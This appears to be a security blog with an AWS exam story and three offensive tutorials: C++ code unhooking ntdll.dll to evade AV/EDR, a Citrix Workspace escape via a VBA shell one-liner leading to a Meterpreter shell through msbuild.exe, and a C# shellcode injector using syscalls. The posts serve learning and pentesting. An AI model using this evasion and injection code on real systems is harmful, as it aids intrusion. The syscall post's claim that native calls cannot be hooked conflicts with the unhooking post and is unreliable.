[GIF via GIPHY]

I took like 2 weeks off and came back to it! I wondered if I had forgotten everything I learned from the course; I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. I eliminated all distractions once again: nobody could get a hold of me, and every ounce of free time was devoted to the task at hand. After completing all the questions there, I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? Then I hunted for any practice questions I could find on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8, so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case I failed 🤣🤞🏾 so I scheduled it 4 days out, on Monday 6/29.

Told you guys I don’t like studying for long. Later that day, at about 1400 hrs, I don’t know why, but I went back to the exam scheduling and saw they had an exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled and confirmed it. As soon as I did that I thought, “why the hell did you do that?”

If there was one thing I knew, it was this: I was going to be even more disappointed than when I came up short on Solutions Architect the first time. I imagine it would have been something like this after failing.

[GIF via GIPHY]

The exam was TOUGH. No other way to put it, and guess what? Every single question was a monster, just like the Bonso questions. Two paragraphs minimum, sometimes like four: a tough scenario involving 3-4 services with security baked into it. All the choices are basically the same and differ slightly in the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely, and one UNDERRATED thing I think could have pushed me over the hump for Solutions Architect is the “Whiteboard” feature on Pearson exams. I used that thing for almost every question on Security Specialty. Unless you’re a Jedi, it’s really tough to get a good understanding of what the monster is asking without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time-wise, I breezed through Practitioner in ~35 minutes and Solutions Architect in ~55 minutes, but this thing, #bruh, I remember looking up and thinking sheesh, you’re two hours deep. I had finally finished all 65 questions. Enter second-guessing yourself:

I’m not clicking next or ending the exam this time! There were maybe 20 questions I was unsure about. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen: reviewing your answers when you’re confident is a cursory thing; when you’re not confident, it’s like playing Russian roulette. I changed about 9 answers total, each one accompanied by the thought, “You’re probably on the borderline right now; you’re going to change an answer that’s correct, make it wrong, and that’s going to be your demise.” It’s worth mentioning that only about 50% of the questions are single choice. The others are select the best 2 or 3 out of 6-7 options. The questions are drawn randomly from a bank, like most exams, so I’m not sure if the same will apply to you, but I noticed at least 2 instances where later questions cleared up earlier ones. Example:

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

The majority of the exam was exactly that: reading and understanding policies. IAM, KMS, and bucket policies: you’d better be able to read and understand them as if they were plain English. There was a ton of KMS-related material; make SURE you know the nitty-gritty like imported key material and all the different KMS encryption types: when, where, rotation, etc.

I clicked next, went through the survey, and I had PASSED!


I think I’ve paid my dues this year, guys. I stepped outside of my comfort zone entirely, and I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19, this will be the first year since I stopped being poor 😂 (~5 years after graduating) that I won’t be on an island celebrating. Such is life. I bought myself AWAE as a birthday gift; I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).


PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a system call to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.
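To make that concrete, here is roughly what the first instructions of a native stub look like before and after hooking on x64. The exact bytes and syscall number vary by Windows build and by product, so treat this as illustrative only:

// Unhooked ntdll stub (x64), as seen in a debugger:
//   mov r10, rcx
//   mov eax, <syscall number>      ; build-specific
//   syscall
//   ret
//
// The same stub hooked by an EDR:
//   jmp <edr_inspection_routine>   ; unconditional jump patched over the prologue
//   ...                            ; the EDR inspects the call, then trampolines back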

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

HANDLE hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

[image: PE file format layout, via Wikipedia]

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what we are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table: an array of section headers, one describing each section. Perfect for iterating through and finding the section we want. This is how we will find our .text section, by using a for loop over the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped view of the clean ntdll.dll on disk)
  • The destination to copy to (hookedVirtualAddressStart, i.e. the module base plus hookedSectionHeader->VirtualAddress)
  • The number of bytes to copy (hookedVirtualAddressSize, taken from hookedSectionHeader->Misc.VirtualSize)

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize);

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

DWORD oldProtection = 0;
BOOL isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax,0x37 and mov eax,0x3a instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven't written? How do you prevent those hooks from catching code you can't change? If you've made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20


Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to an RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel presented over the network onto our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

Sub X()
    Shell "CMD /K %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create a Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and it would have been poor OPSEC anyway. It also meant that C2 frameworks which communicate over HTTP were out; I needed something that worked over raw TCP, like Meterpreter. But how to get a payload onto the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn't over RDP. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format (or as a Base64-encoded binary) and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSBuild is a so-called “living off the land” binary: a Microsoft-signed executable that already exists on the box. It's used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let's see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel's VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However, I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard, if not impossible, to present VBA and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20


After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options to look into: using native Windows system calls (AKA syscalls), or using Dynamic Invocation. Each has its pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly changing the assembly of commonly abused API calls to jump to AV/EDR-controlled code, where the call is inspected and, assuming it is allowed, execution jumps back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files; in this case MSDN tells us they live in Kernel32.dll. These are user-mode DLLs, which means they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. The native API sits closer to the operating system and underlying hardware. There are technically lower levels that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here's a good diagram of how it looks:

Windows Architecture

You can see how Kernel32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist at all? A big reason is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system; the way it accesses lower-level functionality is through native APIs. But if the native APIs still have to call yet lower-level APIs, why not go straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs without affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don't affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can't make changes to them. There are some exceptions to this, like drivers, but they aren't applicable to this post. The big takeaway is that defenders can't hook native API calls, while we are still allowed to make them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easiest way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you're looking for, assuming you already know which API you need (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Syscall stubs tend to follow a pattern: the first argument is preserved with the mov r10,rcx instruction (the syscall instruction overwrites rcx, so the argument is stashed in r10), followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed in Mateusz's table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there's a key piece of information I've left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and find the corresponding syscall for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector
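
Since the screenshots don't reproduce well in text, here is a condensed sketch of the same pattern. The class name and shellcode placeholder are mine, and the P/Invoke signatures are the standard ones from pinvoke.net; the repo has the exact code:

using System;
using System.Runtime.InteropServices;

class Win32InjectorSketch
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    static void Main()
    {
        byte[] shellcode = new byte[] { /* popup-box shellcode elided; supply your own */ };

        // Allocate RWX memory: MEM_COMMIT | MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40
        IntPtr mem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);
        Marshal.Copy(shellcode, 0, mem, shellcode.Length);

        // Point a new thread at the shellcode, then wait forever (0xFFFFFFFF = INFINITE)
        uint threadId;
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
}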

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and start the thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of taking unmanaged code, e.g. C/C++, and using it in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke: just import the DLL, specify the function definition with the help of pinvoke.net, and you're off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. It is indeed possible, though, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won't go too in depth in this post. I would suggest reading those posts to get a good handle on them, and on the process of using syscalls in general. But for completeness: delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature match those of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we're moving the first argument into the r10 register, moving our syscall number into the eax register, and executing the magic syscall instruction. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it's starting to make sense how this all fits together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++-compatible format, in order to call a native API.

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

